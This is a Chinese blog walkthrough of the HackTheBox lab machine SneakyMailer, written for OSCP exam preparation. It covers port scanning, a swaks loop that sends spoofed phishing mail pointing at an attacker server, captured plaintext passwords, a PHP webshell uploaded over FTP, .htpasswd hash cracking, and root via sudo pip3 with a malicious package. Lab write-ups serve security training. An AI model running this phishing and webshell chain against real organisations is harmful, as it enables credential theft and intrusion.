OSCP备考_0x31_HackThBox靶机_SneakyMailer

Ethan医生4个月前靶场122


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.196.68 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.196.68  (扫描UDP)

image.png

依照80端口提示需要绑定HOST

http://sneakycorp.htb

image.png


curl -i http://sneakycorp.htb/team.php > email.txt

将页面内容下载下来

cat email.txt |grep "@" | cut -d '>' -f2  | cut -d '<' -f1 > out.txt

image.png

并将email收集起来

使用SMTP

while read mail; do
    swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197;
  done < email.txt
  工具: 使用swaks(瑞士军刀SMTP工具)发送邮件
  收件人列表: 从email.txt文件中逐行读取邮箱地址
  发件人: 伪装成it@sneakymailer.htb
  主题: "Credentials /Errors" - 利用凭证或错误提示引起关注
  正文内容: 包含一个指向攻击者控制服务器(10.10.14.4)的链接
  SMTP服务器: 使用目标组织的邮件服务器(10.10.10.197)发送

nc -lvnp 80

image.png

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

内容解码后

1
2
3
4
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
UserName : paulbyrd
email : paulbyrd@sneakymailer.htb
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

使用 evolution

连接邮箱

image.png

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C



gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -u sneakycorp.htb子域名爆破

找到一个dev的域名


http://dev.sneakycorp.htb/

image.png




FTP get webshell

上面得到的developer账号密码可以用于FTP,进去是一个dev目录,应该就是前面dev子域名的代码,我们可以直接传webshell:

image.png

上传后门到FTP挡案下

put p_ec.php,访问后门直接拿下shell

image.png


image.png

cd /var/www

pypi底下还有个子域名

image.png

pypi.sneakycorp.htb

在/var/www发现pypi.sneakycorp.htb,把这个也加到hosts访问, 注意直接访问是重定向到主站,需要8080端口:



.htpasswd

pypi目录有个.htpasswd文件,hashcat解出来pypi密码:

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

pypi: soufianeelhaoui

PyPI

现在我们有pypi的密码,就可以上传恶意的package执行代码,参考:

sudo -l 

可以无需密码,以root权限运行/usr/bin/pip3,那基本就是通过pip3安装恶意模块

标签: OSCP

相关文章

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

OSCP备考_0x09_Vulnhub靶机_SickOs: 1.1

名称说明靶机下载链接https://www.vulnhub.com/entry/sickos-11,132/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.16...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。